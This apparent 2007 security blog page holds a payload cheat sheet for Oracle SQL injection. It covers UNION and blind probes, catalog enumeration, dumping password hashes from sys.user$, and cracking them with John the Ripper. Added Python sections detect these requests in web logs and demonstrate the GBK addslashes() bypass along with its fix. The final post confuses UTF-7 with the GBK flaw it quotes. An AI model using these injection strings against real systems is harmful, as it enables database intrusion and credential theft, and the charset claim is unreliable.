Pen Testing Windows Active Directory

July 28, 2007 Research | Comments (1) admin @ 8:43 pm

I have put together some thoughts on conducting a penetration test against a Windows Active Directory environment.

Currently this article focuses on these two scenarios:-

1. A pentester is allowed to plug his laptop into the target network.

2. A pentester is not allowed to plug his laptop in and only has access to a standard workstation.

You can read it as a ".doc" file here and as a pdf here.

PS: I will do a better job with editing the Word document in the next version of this document.

SQL Injection In Oracle

July 11, 2007 Research | Comments (1) sid @ 9:37 am

1. Finding table names

select table_name from user_tables

Example:-

http://192.168.2.199/ora.php?id=101+union+all+select+table_name+from+user_tables

Blind Injection:-

http://192.168.2.199/ora.php?id=101 and ascii(substr((select+table_name+from+user_tables where rownum=1),1,1))>100

———————————————–

2. Iterating through the different rows:

Unfortunately it is not as straightforward, because there is no LIMIT clause in Oracle; instead you wrap the query in a subselect that exposes ROWNUM and filter on that.

Syntax:-

select column_1, column_2 from (select rownum r_, column_1, column_2 from table_1, table_2 where field_3 = 'some value') where r_ = 2

EXAMPLE:-

http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1

————————————————————————–

3. Finding column names:

select column_name from user_tab_columns

————————————————————————–

4. Finding Version:

Select banner from v$version

———————————————————————–

5. Finding database user names:-

http://192.168.2.199/ora.php?id=101+union+all+select+username,null+from+all_users

———————————————————————

6. Finding password hashes (the user in the connection string should be a DBA):

select name, astatus, password from sys.user$ where astatus = 0;

(astatus = 0 selects only the users who are not locked)

Example:-

http://192.168.2.199/ora.php?id=101+union+all+select+name||'--'||password+from+sys.user$

In the above example I had only one column to select a string from the database, so I concatenated the username and password fields together, separated with '--'.

—————————————————————————-

7. Cracking passwords using John the Ripper:-

Thanks to pentestmonkey for this.

$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt --format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])
DIP              (DIP)
ORACLE           (FLOWS_020100)
ORACLE           (FLOWS_FILES)
ORACLE           (XDB)
ORACLE           (CTXSYS)
PASSWORD         (HR)
PASSWORD         (SYSTEM)
PASSWORD         (SYS)
TEST             (TEST2)
TEST1            (TEST1)

——————————————————————————
What else do you want from a SQL injection?
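The requests listed in this post are also exactly what a defender wants to recognise in web server logs. The following Python script is an added example, not code from this post or from pentestmonkey: it parses constructed common-log-format lines (the client addresses, timestamps, status codes and sizes are made up; the request targets reuse the ora.php URLs shown above), URL-decodes each query string so that '+' becomes a space, and flags requests containing UNION ... SELECT, the Oracle catalog views named in the post (user_tables, user_tab_columns, all_users, v$version, sys.user$), the ROWNUM subselect, or the ascii(substr(...)) blind-injection probe. The rule names and the log format are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache common log format). The request
# targets reuse the ora.php URLs from the post above; client addresses,
# timestamps, status codes and sizes are made up for this example.
SAMPLE_LOG = """\
192.168.2.50 - - [11/Jul/2007:09:37:01 +0000] "GET /ora.php?id=101 HTTP/1.1" 200 512
192.168.2.50 - - [11/Jul/2007:09:37:05 +0000] "GET /ora.php?id=101+union+all+select+table_name+from+user_tables HTTP/1.1" 200 2048
192.168.2.50 - - [11/Jul/2007:09:37:09 +0000] "GET /ora.php?id=101+and+ascii(substr((select+table_name+from+user_tables+where+rownum=1),1,1))>100 HTTP/1.1" 200 512
192.168.2.50 - - [11/Jul/2007:09:37:12 +0000] "GET /ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1 HTTP/1.1" 200 2048
192.168.2.50 - - [11/Jul/2007:09:37:20 +0000] "GET /ora.php?id=101+union+all+select+name||'--'||password+from+sys.user$ HTTP/1.1" 200 2048
192.168.2.51 - - [11/Jul/2007:09:40:00 +0000] "GET /ora.php?id=102 HTTP/1.1" 200 512
"""

# Common log format: client, ident, user, [timestamp], "METHOD target protocol", status
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Detection rules (hypothetical names), applied to the decoded, lower-cased query string.
RULES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("oracle-catalog-view", re.compile(
        r"\b(?:user_tables|user_tab_columns|all_users)\b|\bv\$version\b|\bsys\.user\$")),
    ("rownum-pagination", re.compile(r"\bselect\s+rownum\b")),
    ("blind-ascii-substr", re.compile(r"\bascii\s*\(\s*substr\s*\(")),
]


def decode_query(target: str) -> str:
    """Return the query string of a request target, URL-decoded ('+' -> space),
    lower-cased and with whitespace runs collapsed, i.e. the SQL fragment as the
    back end would see it rather than as it appears in the raw log line."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query).lower()
    return re.sub(r"\s+", " ", decoded)


def match_rules(query: str) -> list:
    """Names of all rules that fire on a decoded query string, in RULES order."""
    return [name for name, rx in RULES if rx.search(query)]


def analyze_log(text: str) -> list:
    """Parse log lines and return one finding per request that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        query = decode_query(m.group("target"))
        hits = match_rules(query)
        if hits:
            findings.append({
                "client": m.group("client"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "query": query,
                "rules": hits,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ts"], f["client"], ",".join(f["rules"]), f["target"])
```

Decoding before matching matters: the mixed-case, '+'-separated forms on this page slip past a literal pattern applied to the raw URL, so a WAF or SIEM rule needs the same normalisation. Catalog-view names such as user_tables or sys.user$ have no business appearing in an application's query string at all, which makes that rule a low-noise one to alert on.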

SQL Injection In Ingres

SQL Injection In DB2

SQL Injection And UTF 7 encoding

July 5, 2007 What Did I Learn Today, Research | Comments (0) sid @ 5:33 pm

Query:- There is a web application vulnerable to SQL injection, but the web server has added protection like magic_quotes, or the application calls addslashes(), which means I can't insert a single quote and thus can't exploit the SQL injection. The injection point is in a string field. Does that mean it is safe?

Answer:- To the best of my knowledge, it is safe if your application supports UTF-8 encoding (which is most common). However, if it supports UTF-7 encoding, it becomes vulnerable. This is best described by Chris Shiflett:-

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

"In GBK, 0xbf27 is not a valid multi-byte character, but 0xbf5c is. Interpreted as single-byte characters, 0xbf27 is 0xbf (¿) followed by 0x27 ('), and 0xbf5c is 0xbf (¿) followed by 0x5c (\).

How does this help? If I want to attempt an SQL injection attack against a MySQL database, having single quotes escaped with a backslash is a bummer. If you're using addslashes(), however, I'm in luck. All I need to do is inject something like 0xbf27, and addslashes() modifies this to become 0xbf5c27, a valid multi-byte character followed by a single quote. In other words, I can successfully inject a single quote despite your escaping. That's because 0xbf5c is interpreted as a single character, not two. Oops, there goes the backslash."

Well done, Chris.
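To make the quoted argument concrete from the defender's side, here is an added Python example (not code from this post or from Chris Shiflett). It re-implements addslashes() at the byte level, builds a query by string concatenation the way the quoted post criticises, and then counts unescaped single quotes in the resulting bytes when they are read as a single-byte charset versus as GBK: under GBK the 0xbf5c pair becomes one character, the backslash disappears, and the string literal is broken. It then shows the fix that the linked post's title points at, keeping the value out of the SQL text altogether by binding it as a parameter. An in-memory SQLite table with constructed rows stands in for the MySQL users table, and the table and column names are my own.

```python
import sqlite3


def addslashes(data: bytes) -> bytes:
    """PHP's addslashes() re-implemented at the byte level: it prefixes ', ", \\ and
    NUL with a backslash and knows nothing about multi-byte character sets."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query_by_concatenation(user_input: bytes) -> bytes:
    """The pattern the quoted post criticises: escape with addslashes() and splice
    the result straight into the SQL text (table/column names are constructed)."""
    return b"SELECT name FROM users WHERE name = '" + addslashes(user_input) + b"'"


def unescaped_quotes(sql_bytes: bytes, charset: str) -> int:
    """Interpret the SQL bytes in the given character set, as the database server
    would, and count single quotes that are not preceded by a backslash. An odd
    count means the string literal no longer closes where the developer intended."""
    text = sql_bytes.decode(charset, errors="replace")
    count = 0
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            count += 1
    return count


def make_db() -> sqlite3.Connection:
    """In-memory SQLite table standing in for the MySQL users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("o'brien",)])
    return conn


def lookup_with_bound_parameter(conn: sqlite3.Connection, user_input: bytes,
                                charset: str = "gbk") -> list:
    """The fix: decode the input in the application's declared charset and hand it
    to the driver as a bound parameter, so it never becomes part of the SQL text
    and no escaping step has to agree with the server about byte boundaries."""
    name = user_input.decode(charset, errors="replace")
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    crafted = b"\xbf\x27"  # the 0xbf27 byte pair discussed in the quoted post
    sql = build_query_by_concatenation(crafted)
    print(sql)
    print("unescaped quotes if read as latin-1:", unescaped_quotes(sql, "latin-1"))
    print("unescaped quotes if read as GBK:    ", unescaped_quotes(sql, "gbk"))
    conn = make_db()
    print(lookup_with_bound_parameter(conn, b"o'brien"))
    print(lookup_with_bound_parameter(conn, crafted))
```

The two counts are the whole story: the same bytes are a correctly escaped literal in a single-byte charset and a broken one in GBK, so any escaping function that does not know the connection's charset cannot be relied on. A charset-aware escaper such as mysql_real_escape_string() (with the connection charset actually set) closes that gap; bound parameters avoid it entirely and are the check a code review should look for.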